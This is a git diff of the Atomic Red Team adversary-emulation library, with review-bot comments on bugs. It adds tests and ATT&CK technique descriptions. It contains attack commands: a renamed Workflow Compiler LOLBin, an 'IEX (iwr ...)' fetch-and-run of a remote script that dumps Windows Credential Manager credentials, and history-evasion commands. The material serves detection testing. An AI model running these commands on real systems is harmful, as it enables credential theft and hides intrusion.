+##### Check Prereq Commands:
+```powershell
+Copy-Item C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{renamed_binary}" -Force
+if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+write-host "you need to rename workflow complier before you run this test"
+```
+
+
+
+
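Review bot: Test #7 has no Cleanup Commands, yet its prereq check copies `Microsoft.Workflow.Compiler.exe` to `PathToAtomicsFolder\T1218\src\svchost.exe`, so after the test a masqueraded copy of a LOLBin is left on disk along with `output.txt`; add `Remove-Item "#{renamed_binary}" -ErrorAction Ignore` and `Remove-Item "PathToAtomicsFolder\T1218\src\output.txt" -ErrorAction Ignore` (Test #6 also leaves `output.txt`). The attack line `#{renamed_binary} #{xml_payload} output.txt` invokes both inputs unquoted and without the call operator, which breaks as soon as either path contains a space, whereas Test #6 quotes its payload; use `& "#{renamed_binary}" "#{xml_payload}" output.txt`. Both tests hard-code the `Framework64\v4.0.30319` path, so they will report a missing .NET prerequisite on 32-bit hosts even when the 32-bit Framework directory has the binary. These changes should be mirrored in T1218.yaml, from which this file is generated.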
diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml
index 5ead4c3e..1431cf7e 100644
--- a/atomics/T1218/T1218.yaml
+++ b/atomics/T1218/T1218.yaml
@@ -124,6 +124,7 @@ atomic_tests:
command: |
"#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
- name: Microsoft.Workflow.Compiler.exe Payload Execution
+ auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e
description: |
Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe
supported_platforms:
@@ -148,6 +149,7 @@ atomic_tests:
name: powershell
elevation_required: false
- name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions
+ auto_generated_guid: 4cc40fd7-87b8-4b16-b2d7-57534b86b911
description: |
Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe
supported_platforms:
diff --git a/atomics/T1222.001/T1222.001.md b/atomics/T1222.001/T1222.001.md
index 4dbeacfc..3559d65b 100644
--- a/atomics/T1222.001/T1222.001.md
+++ b/atomics/T1222.001/T1222.001.md
@@ -4,7 +4,7 @@
Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)
-Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
+Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
## Atomic Tests
diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md
index 79c0e9b6..c9bfec54 100644
--- a/atomics/T1543.002/T1543.002.md
+++ b/atomics/T1543.002/T1543.002.md
@@ -8,7 +8,7 @@ Systemd utilizes configuration files known as service units to control how servi
* ExecReload directive covers when a service restarts.
* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.
-Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)
+Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)
While adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)
diff --git a/atomics/T1546.011/T1546.011.md b/atomics/T1546.011/T1546.011.md
index 067c7d43..cb83a0d9 100644
--- a/atomics/T1546.011/T1546.011.md
+++ b/atomics/T1546.011/T1546.011.md
@@ -14,7 +14,7 @@ Custom databases are stored in:
* %WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom and
* hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom
-To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).
+To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).
Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.
diff --git a/atomics/T1546.012/T1546.012.md b/atomics/T1546.012/T1546.012.md
index 03389b7d..df5c047b 100644
--- a/atomics/T1546.012/T1546.012.md
+++ b/atomics/T1546.012/T1546.012.md
@@ -1,10 +1,10 @@
# T1546.012 - Image File Execution Options Injection
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1546/012)
-Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IEFO) debuggers. IEFOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)
+Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
-IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
+IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
diff --git a/atomics/T1547.001/T1547.001.md b/atomics/T1547.001/T1547.001.md
index 4293ddc0..09ec8aed 100644
--- a/atomics/T1547.001/T1547.001.md
+++ b/atomics/T1547.001/T1547.001.md
@@ -5,26 +5,30 @@
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
The following run keys are created by default on Windows systems:
+
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
-The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
+Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
+
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
+
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
+
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md
index cd1a25c4..98064122 100644
--- a/atomics/T1548.002/T1548.002.md
+++ b/atomics/T1548.002/T1548.002.md
@@ -1,4 +1,4 @@
-# T1548.002 - Bypass User Access Control
+# T1548.002 - Bypass User Account Control
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1548/002)
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)
diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md
new file mode 100644
index 00000000..284b4305
--- /dev/null
+++ b/atomics/T1555/T1555.md
@@ -0,0 +1,55 @@
+# T1555 - Credentials from Password Stores
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1555)
+Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.
+
+## Atomic Tests
+
+- [Atomic Test #1 - Extract Windows Credential Manager via VBA](#atomic-test-1---extract-windows-credential-manager-via-vba)
+
+
+
+
+## Atomic Test #1 - Extract Windows Credential Manager via VBA
+This module will extract the credentials found within the Windows credential manager and dump
+them to $env:TEMP\windows-credentials.txt
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Microsoft Word must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+ New-Object -COMObject "word.Application" | Out-Null
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft Word manually to meet this requirement"
+```
+
+
+
+
+
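Review bot: In the Check Prereq Commands, `$process` is never assigned, so `Stop-Process -Name $process` is called with a null Name; that raises a parameter-binding error, which the `catch` turns into `exit 1`, so the prerequisite check appears to report Word as missing even when the COM object was created successfully, and the `winword.exe` instance spawned by `New-Object` is left running. The T1115 variant of this check at least sets `$process = "winword"` first; better still is to close the instance you created rather than killing every Word process on the host: `$app = New-Object -COMObject "Word.Application"`, `$app.Quit()`, `exit 0`. As with T1115, the attack command pulls `Invoke-MalDoc.ps1` from the unpinned `master` branch via `IEX (iwr ...)`, so the code that runs is not fixed by this commit. The fix belongs in T1555.yaml, from which this .md is generated.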
diff --git a/atomics/T1555/T1555.yaml b/atomics/T1555/T1555.yaml
index ad1785e4..e292adfb 100644
--- a/atomics/T1555/T1555.yaml
+++ b/atomics/T1555/T1555.yaml
@@ -2,7 +2,7 @@ attack_technique: T1555
display_name: 'Credentials from Password Stores'
atomic_tests:
- name: Extract Windows Credential Manager via VBA
- auto_generated_guid:
+ auto_generated_guid: 234f9b7c-b53d-4f32-897b-b880a6c9ea7b
description: |
This module will extract the credentials found within the Windows credential manager and dump
them to $env:TEMP\windows-credentials.txt
diff --git a/atomics/T1562.003/T1562.003.md b/atomics/T1562.003/T1562.003.md
index 84bd6076..5bce4173 100644
--- a/atomics/T1562.003/T1562.003.md
+++ b/atomics/T1562.003/T1562.003.md
@@ -1,10 +1,12 @@
-# T1562.003 - HISTCONTROL
+# T1562.003 - Impair Command History Logging
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1562/003)
-Adversaries may configure HISTCONTROL to not log all command history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.
+Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
-This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history.
+On Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.
- Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
+Adversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
+
+On Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
## Atomic Tests
diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md
index dc142392..f647d9b2 100644
--- a/atomics/T1566.001/T1566.001.md
+++ b/atomics/T1566.001/T1566.001.md
@@ -1,6 +1,6 @@
# T1566.001 - Spearphishing Attachment
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1566/001)
-Adversaries may send spearphishing emails with a malicious attachment in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.
+Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.
There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.
diff --git a/atomics/T1574.012/T1574.012.md b/atomics/T1574.012/T1574.012.md
index db753b19..b84c5d66 100644
--- a/atomics/T1574.012/T1574.012.md
+++ b/atomics/T1574.012/T1574.012.md
@@ -4,7 +4,7 @@
The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
-Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
+Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
## Atomic Tests
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 0003e3ee..8b98a0c9 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -627,3 +627,11 @@ f38e9eea-e1d7-4ba6-b716-584791963827
9a2915b3-3954-4cce-8c76-00fbf4dbd014
e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
4ea1fc97-8a46-4b4e-ba48-af43d2a98052
+ecd3fa21-7792-41a2-8726-2c5c673414d3
+3ad4a037-1598-4136-837c-4027e4fa319b
+1c91e740-1729-4329-b779-feba6e71d048
+8faff437-a114-4547-9a60-749652a03df6
+9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52
+234f9b7c-b53d-4f32-897b-b880a6c9ea7b
+7cbb0f26-a4c1-4f77-b180-a009aa05637e
+4cc40fd7-87b8-4b16-b2d7-57534b86b911
diff --git a/docs/maintainers.md b/docs/maintainers.md
index 832d2d60..56ed282e 100644
--- a/docs/maintainers.md
+++ b/docs/maintainers.md
@@ -21,11 +21,15 @@ Any breaking change or major feature should be communicated to the community via
# Maintainers Meeting Cadence
## Sync Meetings
-1. Review any issues labeled `maintainers` and make or plan decisions accordingly.
-2. Review Atomic Friday schedule and assign related tasks as needed.
-2. Open discussion
+Sync meetings are more frequent and less formal, and may be conducted via Zoom, Slack, or email depending on the nature of issues to be discussed. Items that are commonly raised during sync meetings include:
+
+1. Progress or communications related to milestones
+1. Issues labeled `maintainers` or that are otherwise blocked
+2. Time-sensitive decisions that need to be made
## Planning Meetings
-1. Review existing milestones and progress.
-2. Identify future milestones.
-3. Prioritize and tentatively schedule future milestones (i.e., update the roadmap).
+Planning meetings are less frequent, and minutes will be kept and published via GitHub. These meetings are conducted via Zoom, and require that a majority of the core maintainers team be present.
+
+1. Review existing milestones and progress
+2. Identify future milestones
+3. Prioritize and tentatively schedule future milestones